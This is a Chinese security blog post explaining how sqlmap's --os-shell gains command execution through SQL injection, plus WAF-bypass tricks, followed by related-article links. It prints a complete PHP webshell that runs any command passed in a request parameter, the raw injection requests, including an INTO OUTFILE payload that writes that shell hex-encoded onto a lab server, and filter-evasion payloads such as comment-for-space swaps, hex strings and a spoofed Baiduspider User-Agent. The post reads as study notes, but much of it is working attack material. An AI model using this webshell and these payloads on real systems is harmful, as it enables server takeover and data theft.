WEB-漏洞总结(sqlmap的使用和sql过waf)

已于 2022-04-14 13:46:41 修改
阅读量1.6k 收藏 2
点赞数
文章标签: 安全 linux 网络
于 2022-03-24 23:09:34 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_50643984/article/details/123720614
版权
本文详细介绍了SQLMap工具的–os-shell功能,包括其前提条件、执行流程和如何利用它来执行系统命令。讨论了如何通过上传PHP文件实现命令执行,并展示了SQL注入的示例流量。同时,还提到了一些常见的过滤和绕过方法,如使用特殊字符和十六进制转换。此外,文章还涵盖了空格和单引号的过滤绕过策略。
摘要由CSDN通过智能技术生成

记:

sqlmap的–os-shell原理解析

–os-shell的前提
1.必须是root权限,也就是dba权限 sqlmap用–is-dba判断,返回true就是dba权限

2.知道网站的绝对路径,首先sqlmap会尝试报错去发现绝对路经,如果没发现可以主动选择爆破或者自己输入路径

3.关闭gpc转义,因为shell需要上传2个文件。

具体sqlmap的攻击流程差不多是这样:

  1. 测试链接是否能够访问

  2. 判断操作系统版本

  3. 传递一个数组,尝试爆绝对路径

  4. 指定上传路径

  5. 使用lines terminated by 写入一个php文件,该php文件可以进行文件上传

  6. 尝试找到上传的文件的访问路径;直到找到正确的路径

  7. 通过上传的临时文件,尝试上传另外一个php文件, 该文件可以进行命令执行

  8. 尝试进行命令执行 echo command execution test

  9. 直接输入对应的命令

  10. 退出 -–os-shell后删除命令马

他会先上传一个用于上传文件的php文件,如果选择的是其他语言会生成相对于的,
然后通过这个文件上传一个执行命令并且可以回显的文件,最后进行命令执行和回显

tmpulujm.php这个为上传文件脚本
在这里插入图片描述
tmpbezal.php这个文件可以用来执行系统命令,并且将结果返回出来

1 <?php 
 2 $c=$_REQUEST["cmd"];
 3 @set_time_limit(0);
 4 @ignore_user_abort(1);
 5 @ini_set('max_execution_time',0);
 6 $z=@ini_get('disable_functions');
 7 if(!empty($z))
 8 {
 9     $z=preg_replace('/[, ]+/',',',$z);
10     $z=explode(',',$z);
11     $z=array_map('trim',$z);}
12 else
13     {
14         $z=array();
15         }
16 $c=$c." 2>&1\n";
17 function f($n)
18 {global $z;
19 return is_callable($n)and!in_array($n,$z);
20 }
21 if(f('system'))
22 {ob_start();
23 system($c);
24 $w=ob_get_contents();
25 ob_end_clean();
26 }elseif(f('proc_open')){
27     $y=proc_open($c,array(array(pipe,r),array(pipe,w),array(pipe,w)),$t);
28     $w=NULL;
29     while(!feof($t[1])){
30         $w.=fread($t[1],512);
31             }
32         @proc_close($y);
33 }
34     elseif(f('shell_exec')){
35     $w=shell_exec($c);
36     }
37     elseif(f('passthru')){
38         ob_start();
39         passthru($c);
40         $w=ob_get_contents();
41         ob_end_clean();
42         }elseif(f('popen')){
43             $x=popen($c,r);
44             $w=NULL;
45             if(is_resource($x)){
46                 while(!feof($x)){
47                 $w.=fread($x,512);
48                     }
49                     }
50                     @pclose($x);
51                     }elseif(f('exec')){
52                         $w=array();
53                         exec($c,$w);
54                         $w=join(chr(10),$w).chr(10);
55                         }else{
56                             $w=0;
57                             }
58                             print "</pre>".$w."</pre>";?>'''

这是执行命令的php脚本,其他语言暂时不研究。

1. id=1' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x717a767671,(SELECT REPEAT(0x34,1024)),0x7170716271,0x78))s), 8446744073709551610, 8446744073709551610)))-- MBKa&Submit=Submit
2. id=1' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x717a767671,(SELECT (CASE WHEN (0x57=UPPER(MID(@@version_compile_os,1,1))) THEN 1 ELSE 0 END)),0x7170716271,0x78))s), 8446744073709551610, 8446744073709551610)))-- EJbF&Submit=Submit
 
3. id=1' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x717a767671,(SELECT REPEAT(0x31,451)),0x7170716271,0x78))s), 8446744073709551610, 8446744073709551610)))-- LNMk&Submit=Submit
4. id=1' LIMIT 0,1 INTO OUTFILE '/var/www/html/hackable/uploads/tmpujout.php' LINES TERMINATED BY 0x3c3f7068702024633d245f524551554553545b22636d64225d3b407365745f74696d655f6c696d69742830293b4069676e6f72655f757365725f61626f72742831293b40696e695f73657428276d61785f657865637574696f6e5f74696d65272c30293b247a3d40696e695f676574282764697361626c655f66756e6374696f6e7327293b69662821656d70747928247a29297b247a3d707265675f7265706c61636528272f5b2c205d2b2f272c272c272c247a293b247a3d6578706c6f646528272c272c247a293b247a3d61727261795f6d617028277472696d272c247a293b7d656c73657b247a3d617272617928293b7d24633d24632e2220323e26315c6e223b66756e6374696f6e206628246e297b676c6f62616c20247a3b72657475726e2069735f63616c6c61626c6528246e29616e6421696e5f617272617928246e2c247a293b7d69662866282773797374656d2729297b6f625f737461727428293b73797374656d282463293b24773d6f625f6765745f636f6e74656e747328293b6f625f656e645f636c65616e28293b7d656c736569662866282770726f635f6f70656e2729297b24793d70726f635f6f70656e2824632c617272617928617272617928706970652c72292c617272617928706970652c77292c617272617928706970652c7729292c2474293b24773d4e554c4c3b7768696c65282166656f662824745b315d29297b24772e3d66726561642824745b315d2c353132293b7d4070726f635f636c6f7365282479293b7d656c73656966286628277368656c6c5f657865632729297b24773d7368656c6c5f65786563282463293b7d656c736569662866282770617373746872752729297b6f625f737461727428293b7061737374687275282463293b24773d6f625f6765745f636f6e74656e747328293b6f625f656e645f636c65616e28293b7d656c7365696628662827706f70656e2729297b24783d706f70656e2824632c72293b24773d4e554c4c3b69662869735f7265736f7572636528247829297b7768696c65282166656f6628247829297b24772e3d66726561642824782c353132293b7d7d4070636c6f7365282478293b7d656c7365696628662827657865632729297b24773d617272617928293b657865632824632c2477293b24773d6a6f696e28636872283130292c2477292e636872283130293b7d656c73657b24773d303b7d7072696e7420223c7072653e222e24772e223c2f7072653e223b3f3e-- -&Submit=Submit

这是sqlmap写shell的流量。

我们可以直接上传大马进行下一步的工作。当然亦可以上传一句话,然后利用菜刀进行连接。

1.空格被拦截

	/**/,/*!*/,%20,%09,%0a,%0b,%0c,%0d,()

2.单引号被过滤

 将字符转换为16进制
 例如:
 	select * from users where username = 'Dumb';
 	select * from users where username = 0x44756d62;

and = &&
or = ||
xor = |
not = !

白名单爬虫绕过

header={’User-Agent‘:'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'}

异或绕过:Xor 或者 ^ 异或顾名思义,两个条件结果相同为假。不同为真。

1^0为1 1^1 0^0为0。

1‘ and ‘1’='1

注入成功

1’ ^ ‘1’='1

id=1 %26%26 1=1 通过

在这里我们使用&&替换and关键字来做判断

javelin266桑桑
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Web安全】实战sqlmap绕过WAF
HBohan的博客
10-26 4708
前言 随着最近几年安全行业的兴起,市场关注度的不断提升,安全防护的软件也在不断提升,不在是那个随便找一个站就能马上发现漏洞了,没有以前那么多所谓的“靶场”了,在这次的实战中遇到的SQL注入与其他的有点不一样,需要考虑的东西很多,写得不好的地方师傅们勿喷。 【查看资料】 实战演示 通过前期的信息收集发现存在注入的页面如下: 直接使用sqlmap跑发现出现如下错误: python2 sqlmap.py -u "http://xxxx?&daxxtae=null&parame=xxxxxx" .
<小迪安全>19-SQL注入之sqlmap绕过WAF
hackerXxxt的博客
03-17 854
1.白名单方式一:IP白奖单从网络层获取的ip,这种一般伪造不来,如果是获取客户端的IP,这样就可能存在伪造IP绕过的情况。测试方法:修改http的header来bypass wafx-Real-ip方式二:静态资源特定的静态资源后缀请求,常见的静态文件(.js .jpg .swf .css等等),类似白名单机制,waf为了检测效率,不去检测这样一些静态文件名后缀的请求。id=1id=1备注: Aspx/php只识别到前面的.aspx/.php后面基本不识别。
SQL注入之SQLmap入门
IT-Blog
01-09 2239
sqlmap也是渗透中常用的一个注入工具,其实在注入工具方面,一个sqlmap就足够用了。现在支持python3了 基本参数 is-dba 当前用户权限 dbs 所有数据库 current-db 当前数据库 users 所有用户 current-user 当前用户 --tables ...
sqlmap工具使用
huangyongkang666的博客
03-21 3726
sqlmap工具使用 1.sqlmap介绍 SQLMAP是开源的自动化SQL注入工具,由Python写成,具有如下特点: 1、完全支持MySQL、Oracle、PostgreSQL、MSSQL、Access、IBM DB2、SQLite、Firebird、Sybase、SAP MaxDB、HSQLDB和Informix等多种数据库管理系统。 2、完全支持布尔型盲注、时间型盲注、基于错误信息的注入、联合查询注入和堆查询注入。 3、在数据库证书、IP地址、端口和数据库名等条件允许的情况下支持不通过SQL注入点而
SQL注入详解】
一纸荒芜的博客
08-17 3756
sql注入类型与其他扩展
sqlmap使用方法
天上掉馅饼
02-25 1216
sqlmap使用方法
sqlmap的--os-shell
qq_54037445的博客
01-15 2583
(1)、询问你是否需要sqlmap去尝试网站的绝对路径,一般是尝试一些常用的绝对路径,如:'C:/xampp/htdocs/, C:/wamp/www/, C:/Inetpub/wwwroot/'等,我们使用的是靶场,他爆破不到,所以选择n;利用into outfile 向指定的网站的物理路径写入一个木马文件,该木马文件的编写语言为该网站的编程语言,这个木马文件的主要作用是可以上传一个用于执行命令的木马,并且对用于执行命令的木马进行赋权,使其具有读写执行权限;(2)、已知网站的物理路径;
渗透测试 ( 6 ) --- SQL 注入神器 sqlmap
墨鱼菜鸡
07-11 3084
sqlmap 官网:http://sqlmap.org/ sqlmap文档地址:https://github.com/sqlmapproject/sqlmap/wiki/Usage sqlmap 使用 思维导图:http://download.csdn.net/detail/freeking101/9887831 黑帽与白帽都喜爱的十大SQL注入工具:...
sql注入漏洞--sqlmap使用
qq_43710889的博客
06-16 2777
文章目录sql注入漏洞--sqlmap使用基本流程:实战get请求命令:`python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --users`命令:`python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --dbs`命令:`python sqlmap.py -u "http://testphp.vulnweb.com/artists.p
sqlmap中文手册-sql注入自动化测试工具
07-19
此外,SQLMap还具备绕过WAFWeb应用防火墙)的能力,提高了在复杂环境下的成功率。 在保持工具最新性方面,用户可以通过官方GitHub仓库获取最新版本,了解更新日志,确保使用的始终是最先进的工具。同时,社区的...
渗透测试必备神器SQLMAP的所有绕waf脚本合集
最新发布
10-18
SQLMAP通过自动化的智能探测和多种技术,如盲注、时间延迟注入、错误注入等,来判断目标应用程序是否存在SQL注入漏洞,并且可以绕过WAF的检测。这些脚本是基于不同的数据库系统(如MySQL、PostgreSQL、Oracle等)的...
超详细SQLMap使用攻略及技巧分享(转载)
Larva35的博客
03-01 1271
原地址’https://www.freebuf.com/sectool/164608.html’ sqlmap是一个开源的渗透测试工具,可以用来进行自动化检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。 sqlmap目前最新版本为1.1.8-8,相关资源如下: 官方网站:http://sqlmap.org/, 下载地址:https://githu
SQL注入基础入门笔记
jhfjdf的博客
07-04 788
学习笔记--SQLday01 SQL注入什么是SQL注入?SQL注入的流程1、判断是否有注入点显错注入不显错的判断方法2、判断注入点的类型3、判断字段数目4、判断字段回显的位置5、拼接SQL语句来查询相关信息或提权补充判断数据库类型防注入的解决办法(绕过):1、将拼接的语句转换为URL编码形式2、将拼接的路径转换为hex十六进制编码3、使用不同的形式的真假语句SQL注入的类型 day01 SQL注入 什么是SQL注入? SQL是操作数据库的结构化查询语言,SQL注入就是攻击者通过SQL语言的拼接(用户的输入
SQLMap使用|命令大全(干货)
热门推荐
qq_45719090的博客
02-27 1万+
适合新手的sqlmap使用教程,附带sqlmap命令
sqlmap流量攻击分析
chenfeng857的博客
11-18 2181
首先讲一下–os-shell的攻击流程 1、测试链接是否能够访问 2、判断操作系统版本 3、传递一个数组,尝试爆绝对路径 4、指定上传路径 5、使用lines terminated by 写入一个php文件,该php文件可以进行文件上传 6、尝试找到上传的文件的访问路径;直到找到正确的路径 7、通过上传的临时文件,尝试上传另外一个php文件, 该文件可以进行命令执行 8、尝试进行命令执行 echo command execution test 9、直接输入对应的命令即可 10、退出–os-shell后删除命
sqlmap os-shell原理
信安路上……
12-04 2662
sqlmap os-shell原理 0x01 流程 i. 简单判断 从截图显示中,可以看到有以下几步 1、选择 web 应用语言 2、发现(提供)一个可写的绝对路径 3、顺序(不同方法)上传tmpujout.php、tmpbvwsp.php两个文件 ii. 流量分析 主要的http流量有 4 条,第 2 条根据@@version_compile_os首字母判断操作系统,第 4 ...
PHP爆绝对路径方法收集贴
dibodang1423的博客
06-15 443
1、单引号爆路径 说明: 直接在URL后面加单引号,要求单引号没有被过滤(gpc=off)且服务器默认返回错误信息。 Eg: www.xxx.com/news.php?id=149′ 2、错误参数值爆路径 说明: 将要提交的参数值改成错误值,比如-1。单引号被过滤时不妨试试。 Eg: www.xxx.com/researcharchive.php?id=-1 3、Go...
sqlmap之--os-shell
qq_45927819的博客
03-26 1万+
1、–os-shell原理 使用udf提权获取webshell,也是通过into outfile向服务器写入两个文件,一个是可以直接执行系统命令,一个是进行上传文件。 –os-shell的执行条件: dbms为mysql,网站必须是root权限 攻击者需要知道网站的绝对路径 magic_quotes_gpc = off,php主动转移功能关闭 2、环境介绍 phpstudy+sqlmap 3、探测网站根目录 python3 sqlmap.py -u "127.0.0.1/sqli-labs-master
Sqlmap工具使用笔记
weixin_51339377的博客
04-07 4854
pip install sqlmap SQLmap建议使用kali版本的 不建议使用windows版本 攻击的时候建议使用vps去攻击 否则本地ip会很快被封 sqlmap sqlmap -u "目标网址" --dbs sqlmap -u "目标网址" -D [数据库名] --tables sqlmap -u "目标网址" -D [数据库名] -T [表名] --columns sqlmap -u "目标网址" -D [数据库名] -T [表名] -C [列名] --dump...
SQLMap tamper脚本:绕过WAF与渗透测试指南
"SQLMap之Tamper文档详细介绍了如何使用SQLMap的tamper脚本来绕过Web应用程序的敏感字符过滤和WAF规则,以便进行渗透测试。文档涵盖了tamper脚本的作用、用法以及针对不同数据库类型的tamper脚本选择。" 在网络安全...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值